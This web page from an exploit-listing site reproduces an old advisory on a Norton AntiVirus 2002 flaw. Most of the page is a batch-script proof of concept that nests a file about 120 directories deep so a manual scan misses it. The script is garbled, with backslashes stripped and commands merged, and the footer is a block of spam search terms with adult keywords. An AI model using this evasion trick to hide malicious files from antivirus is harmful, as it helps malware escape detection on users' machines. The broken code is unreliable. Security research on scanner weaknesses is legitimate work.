about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass Vulnerability


Title Symantec Norton AntiVirus 2002 Nested File Manual Scan Bypass Vulnerability
Published 2004-04-17-12:00AM
Updated 2004-04-19-02:56PM
Class Failure to Handle Exceptional Conditions
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Discovery is credited to Bipin Gautam <visitbipin@hotmail.com>.
Vulnerable  Symantec Norton AntiVirus 2002
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 98
Microsoft Windows ME
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows XP Home
Microsoft Windows XP Professional
Not Vulnerable  
Code   The following proof-of-concept was provided:

@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo ?
echo ************************************************
echo -( For a harmless test... you can use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cdc:
cd:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo ***************************************************************
echo Now you can inject any file inside the folder 'X' which is inside
echo 120'th sub-directory of 'c:1' [ i.e c:1..........[120'th dir].....X ]
echo Note: The file you are moving to'c:1...X' should only contain
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc...
echo not as '123.not' 'qwert.hak'
echo .........
echo So, ARE YOU DONE!?
echo .........
echo After this batch script is terminated, you'll
echo find the file you ^just copied^ inside c:1........Xecho now in c:33333111......[130' th dir].....Xecho mmm... Then have a manual scan of c:3 Any file you
echo have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!!
echo ***************************************************

pause
cdmd 3333333333cdxcopy /E /I c:1*.* c:3333333333exit
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 12:00:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
PHP4/4.3.9 eduddy WWW.Video. t844t I DONT CAR Glrjswltoy dmzj.5d6d. www.xxx mo www.pinkse eduddy nuke.html/ nude pics venues ope news for c 91.121.124 hoker girl news for c xy2.765w.c masala.com santa Wap.trick. edison el se t966t WWW.Asean w w w .s e /search/ex maxcpm.inf Imegs /search/ex vsftpd a0 Adult vide 200 /compo Www.nudegi news for c www.fhot.c www.sex ar maxcpm.inf www.89,com Www.89 sex celebrety Www.Sexpic 105506 pawan se vedio Bondage malayalam Hyperlink all cartoo sex galler